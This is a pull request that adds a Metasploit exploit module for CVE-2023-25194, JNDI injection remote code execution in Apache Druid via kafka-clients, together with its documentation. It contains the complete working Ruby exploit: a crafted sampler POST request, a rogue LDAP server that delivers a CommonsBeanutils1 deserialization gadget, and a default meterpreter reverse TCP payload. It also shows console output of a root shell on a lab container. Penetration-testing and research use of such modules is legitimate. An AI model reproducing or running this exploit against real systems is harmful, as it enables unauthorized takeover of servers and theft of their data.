### PR TITLE
Added exploit for CVE-2023-25194

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
+++ b/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
@@ -1,12 +1,18 @@
 ## Vulnerable Application
 
-Apache Kafka is an open-source distributed event streaming platform that is used for real-time data streaming and processing. Kafka clients are a set of Java libraries that allow you to produce and consume messages from Apache Kafka.
+Apache Kafka is an open-source distributed event streaming platform that is used for real-time data streaming and processing.
+Kafka clients are a set of Java libraries that allow you to produce and consume messages from Apache Kafka.
 
-In the version prior to 3.3.2, there is a JNDI injection issue in the Apache Kafka clients if an attacker is able to set the `sasl.jaas.config` property for any of the connector's Kafka clients to `com.sun.security.auth.module.JndiLoginModule`. It will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.
+In the version prior to 3.3.2, there is a JNDI injection issue in the Apache Kafka clients if an attacker is able to set the
+`sasl.jaas.config` property for any of the connector's Kafka clients to `com.sun.security.auth.module.JndiLoginModule`.
+It will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can
+use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization
+of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.
 
-As Apache Druid dependeds on kafka-clients to connect to one of its datasources, making it out of the box vulnerable if using any affected version
+As Apache Druid dependeds on kafka-clients to connect to one of its datasources, making it out of the box vulnerable if using any
+affected version.
 
-The below docker compose file can be used to build a vulnerable container 
+The below docker compose file can be used to build a vulnerable container.
 
 ```doocker-compose
 version: '2'
@@ -62,3 +68,9 @@ meterpreter > exit
 
 [*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
 ```
+
+## Options
+
+### TARGETURI (required)
+
+The path to the APISIX routes controller (Default: `/`).

--- a/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
+++ b/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
@@ -1,0 +1,64 @@
+## Vulnerable Application
+
+Apache Kafka is an open-source distributed event streaming platform that is used for real-time data streaming and processing. Kafka clients are a set of Java libraries that allow you to produce and consume messages from Apache Kafka.
+
+In the version prior to 3.3.2, there is a JNDI injection issue in the Apache Kafka clients if an attacker is able to set the `sasl.jaas.config` property for any of the connector's Kafka clients to `com.sun.security.auth.module.JndiLoginModule`. It will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.
+
+As Apache Druid dependeds on kafka-clients to connect to one of its datasources, making it out of the box vulnerable if using any affected version
+
+The below docker compose file can be used to build a vulnerable container 
+
+```doocker-compose
+version: '2'
+services:
+ web:
+   image: vulhub/apache-druid:25.0.0
+   ports:
+    - "8888:8888"
+```
+
+
+## Verification Steps
+
+Metasploit:
+
+1. `./msfconsole`
+1. `use exploit/multi/http/apache_druid_cve_2023_25194`
+1. `set rhosts <rhost>`
+1. `run`
+
+## Scenarios
+
+### Apache Kafka-clients 3.3.1 on Druid version 25.0.0
+
+```
+msf6 exploit(multi/http/apache_druid_cve_2023_25194) > exploit 
+
+[*] Started reverse TCP handler on 172.18.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to trigger the jndi callback...
+[+] The target is vulnerable.
+[+] Delivering the serialized Java object to execute the payload...
+[*] Client sent unbind request
+[*] Server stopped.
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:42908) at 2023-06-22 13:33:01 +0200
+
+meterpreter > sysinfo
+Computer     : 72fc9c4031a6
+OS           : Linux 6.1.11-1-MANJARO #1 SMP PREEMPT_DYNAMIC Thu Feb  9 14:03:23 UTC 2023
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > shell
+Process 1112 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+find /opt/druid/extensions/druid-kafka-indexing-service/ -iname "kafka-clients*"
+/opt/druid/extensions/druid-kafka-indexing-service/kafka-clients-3.3.1.jar
+^C
+Terminate channel 1? [y/N]  y
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
+```

--- a/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
+++ b/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
@@ -9,7 +9,7 @@ It will allow the server to connect to the attacker's LDAP server and deserializ
 use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization
 of untrusted data (or) RCE vulnerability when there are gadgets in the classpath.
 
-As Apache Druid dependeds on kafka-clients to connect to one of its datasources, making it out of the box vulnerable if using any
+As Apache Druid depends on kafka-clients to connect to one of its data sources, making it out of the box vulnerable if using any
 affected version.
 
 The below docker compose file can be used to build a vulnerable container.
@@ -31,6 +31,9 @@ Metasploit:
 1. `./msfconsole`
 1. `use exploit/multi/http/apache_druid_cve_2023_25194`
 1. `set rhosts <rhost>`
+1. `set target <target>`
+1. `set srvhost <srvhost>`
+1. `set SSL <true or false>`
 1. `run`
 
 ## Scenarios

--- a/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
+++ b/documentation/modules/exploit/multi/http/apache_druid_cve_2023_25194.md
@@ -14,7 +14,7 @@ affected version.
 
 The below docker compose file can be used to build a vulnerable container.
 
-```doocker-compose
+```yaml
 version: '2'
 services:
  web:

--- a/modules/exploits/multi/http/apache_druid_cve_2023_25194.rb
+++ b/modules/exploits/multi/http/apache_druid_cve_2023_25194.rb
@@ -5,12 +5,10 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::Retry
   include Msf::Exploit::Remote::JndiInjection
   include Msf::Exploit::Remote::HttpClient
-  # include Msf::Exploit::Remote::CheckModule
   prepend Msf::Exploit::Remote::AutoCheck
-
-  # attr_accessor :vulnerable_plugins
 
   def initialize(_info = {})
     super(
@@ -78,14 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def wait_until(&block)
-    datastore['WfsDelay'].times do
-      break if block.call
-
-      sleep(1)
-    end
-  end
-
   def check
     validate_configuration!
 
@@ -95,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = trigger
     return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
 
-    wait_until { @search_received }
+    retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received }
 
     return Exploit::CheckCode::Unknown('No LDAP search query was received.') unless @search_received
 
@@ -131,16 +121,16 @@ class MetasploitModule < Msf::Exploit::Remote
         ioConfig: {
           type: 'kafka',
           consumerProperties: {
-            "bootstrap.servers": '127.0.0.1:6666',
+            "bootstrap.servers": "#{Faker::Internet.ip_v4_address}:#{Faker::Number.number(digits: 4)}",
             "sasl.mechanism": 'SCRAM-SHA-256',
             "security.protocol": 'SASL_SSL',
-            "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"#{jndi_string}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
+            "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"#{jndi_string}\" useFirstPass=\"true\" serviceName=\"#{Rex::Text.rand_text_alphanumeric(5)}\" debug=\"true\" group.provider.url=\"#{Rex::Text.rand_text_alphanumeric(5)}\";"
           },
-          topic: 'test',
+          topic: Rex::Text.rand_text_alpha(8..12).to_s,
           useEarliestOffset: true,
-          inputFormat: { type: 'regex', pattern: '([\\s\\S]*)', listDelimiter: '56616469-6de2-9da4-efb8-8f416e6e6965', columns: ['raw'] }
+          inputFormat: { type: 'regex', pattern: '([\\s\\S]*)', listDelimiter: (SecureRandom.uuid.gsub('-', '')[0..20]).to_s, columns: ['raw'] }
         },
-        dataSchema: { dataSource: 'sample', timestampSpec: { column: '!!!_no_such_column_!!!', missingValue: '1970-01-01T00:00:00Z' }, dimensionsSpec: {}, granularitySpec: { rollup: false } },
+        dataSchema: { dataSource: Rex::Text.rand_text_alphanumeric(5..10).to_s, timestampSpec: { column: Rex::Text.rand_text_alphanumeric(5..10).to_s, missingValue: DateTime.now.utc.iso8601.to_s }, dimensionsSpec: {}, granularitySpec: { rollup: false } },
         tuningConfig: { type: 'kafka' }
       },
       samplerConfig: { numRows: 500, timeoutMs: 15000 }
@@ -164,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
     fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 400
 
-    wait_until { @search_received && (!handler_enabled? || session_created?) }
+    retry_until_truthy(timeout: datastore['WfsDelay']) { @search_received && (!handler_enabled? || session_created?) }
     handler
   ensure
     cleanup

--- a/modules/exploits/multi/http/apache_druid_cve_2023_25194.rb
+++ b/modules/exploits/multi/http/apache_druid_cve_2023_25194.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' => {
         'RPORT' => 8888,
         'SSL' => true,
-        'SRVPORT' => 389,
+        'SRVPORT' => 3389,
         'WfsDelay' => 30
       },
       'Targets' => [

--- a/modules/exploits/multi/http/apache_druid_cve_2023_25194.rb
+++ b/modules/exploits/multi/http/apache_druid_cve_2023_25194.rb
@@ -1,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::JndiInjection
+  include Msf::Exploit::Remote::HttpClient
+  # include Msf::Exploit::Remote::CheckModule
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  # attr_accessor :vulnerable_plugins
+
+  def initialize(_info = {})
+    super(
+      'Name' => 'Apache Druid JNDI Injection RCE',
+      'Description' => %q{
+
+        This module is designed to exploit the JNDI injection vulnerability
+        in Druid. The vulnerability specifically affects the indexer/v1/sampler
+        interface of Druid, enabling an attacker to execute arbitrary commands
+        on the targeted server.
+
+        The vulnerability is found in Apache Kafka clients versions ranging from
+        2.3.0 to 3.3.2. If an attacker can manipulate the sasl.jaas.config
+        property of any of the connector's Kafka clients to com.sun.security.auth.module.JndiLoginModule,
+        it allows the server to establish a connection with the attacker's LDAP server
+        and deserialize the LDAP response. This provides the attacker with the capability
+        to execute java deserialization gadget chains on the Kafka connect server,
+        potentially leading to unrestricted deserialization of untrusted data or even
+        remote code execution (RCE) if there are relevant gadgets in the classpath.
+
+        To facilitate the exploitation process, this module will initiate an LDAP server
+        that the target server needs to connect to in order to carry out the attack.
+      },
+      'Author' => [
+        'RedWay Security <info[at]redwaysecurity.com>', # Metasploit module
+        'Jari Jääskelä <https://github.com/jarijaas>' # discovery
+      ],
+      'References' => [
+        [ 'CVE', '2023-25194' ],
+        [ 'URL', 'https://hackerone.com/reports/1529790'],
+        [ 'URL', 'https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz' ]
+      ],
+      'DisclosureDate' => '2023-02-07',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8888,
+        'SSL' => true,
+        'SRVPORT' => 389,
+        'WfsDelay' => 30
+      },
+      'Targets' => [
+        [
+          'Windows', {
+            'Platform' => 'win'
+          },
+        ],
+        [
+          'Linux', {
+            'Platform' => 'unix',
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/python/meterpreter_reverse_tcp'
+            }
+          },
+        ]
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Base path', '/'])
+    ])
+  end
+
+  def wait_until(&block)
+    datastore['WfsDelay'].times do
+      break if block.call
+
+      sleep(1)
+    end
+  end
+
+  def check
+    validate_configuration!
+
+    vprint_status('Attempting to trigger the jndi callback...')
+
+    start_service
+    res = trigger
+    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
+
+    wait_until { @search_received }
+
+    return Exploit::CheckCode::Unknown('No LDAP search query was received.') unless @search_received
+
+    report_vuln({
+      host: rhost,
+      port: rport,
+      name: name.to_s,
+      refs: references,
+      info: "Module #{fullname} found vulnerable host."
+    })
+
+    Exploit::CheckCode::Vulnerable
+  ensure
+    cleanup_service
+  end
+
+  def build_ldap_search_response_payload
+    return [] if @search_received
+
+    @search_received = true
+
+    return [] unless @exploiting
+
+    print_good('Delivering the serialized Java object to execute the payload...')
+    build_ldap_search_response_payload_inline('CommonsBeanutils1')
+  end
+
+  def trigger
+    data = {
+      type: 'kafka',
+      spec: {
+        type: 'kafka',
+        ioConfig: {
+          type: 'kafka',
+          consumerProperties: {
+            "bootstrap.servers": '127.0.0.1:6666',
+            "sasl.mechanism": 'SCRAM-SHA-256',
+            "security.protocol": 'SASL_SSL',
+            "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"#{jndi_string}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
+          },
+          topic: 'test',
+          useEarliestOffset: true,
+          inputFormat: { type: 'regex', pattern: '([\\s\\S]*)', listDelimiter: '56616469-6de2-9da4-efb8-8f416e6e6965', columns: ['raw'] }
+        },
+        dataSchema: { dataSource: 'sample', timestampSpec: { column: '!!!_no_such_column_!!!', missingValue: '1970-01-01T00:00:00Z' }, dimensionsSpec: {}, granularitySpec: { rollup: false } },
+        tuningConfig: { type: 'kafka' }
+      },
+      samplerConfig: { numRows: 500, timeoutMs: 15000 }
+    }
+
+    @search_received = false
+
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri, '/druid/indexer/v1/sampler') + '?for=connect',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => data.to_json
+    )
+  end
+
+  def exploit
+    validate_configuration!
+    @exploiting = true
+    start_service
+    res = trigger
+    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 400
+
+    wait_until { @search_received && (!handler_enabled? || session_created?) }
+    handler
+  ensure
+    cleanup
+  end
+end


### PR DESCRIPTION
This module exploits CVE-2023-25194, a vulnerability that enables an attacker to achieve remote code execution on Apache Druid. The vulnerability arises from a JNDI injection issue within the Apache Kafka clients. By leveraging this vulnerability, an attacker can execute arbitrary code on the targeted Apache Druid instance.

### Vulnerable Application

docker-compose.yml
```yml
version: '2'
services:
 web:
   image: vulhub/apache-druid:25.0.0
   ports:
    - "8888:8888"
```

```
$ docker-compose up
```

## Verification Steps

Metasploit:

1. `./msfconsole`
1. `use exploit/multi/http/apache_druid_cve_2023_25194`
1. `set rhosts <rhost>`
1. `run`

## Scenarios

### Apache Kafka-clients 3.3.1 on Druid version 25.0.0

```
msf6 exploit(multi/http/apache_druid_cve_2023_25194) > exploit 

[*] Started reverse TCP handler on 172.18.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to trigger the jndi callback...
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unbind request
[*] Server stopped.
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:42908) at 2023-06-22 13:33:01 +0200

meterpreter > sysinfo
Computer     : 72fc9c4031a6
OS           : Linux 6.1.11-1-MANJARO #1 SMP PREEMPT_DYNAMIC Thu Feb  9 14:03:23 UTC 2023
Architecture : x64
Meterpreter  : python/linux
meterpreter > shell
Process 1112 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
find /opt/druid/extensions/druid-kafka-indexing-service/ -iname "kafka-clients*"
/opt/druid/extensions/druid-kafka-indexing-service/kafka-clients-3.3.1.jar
^C
Terminate channel 1? [y/N]  y
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
```

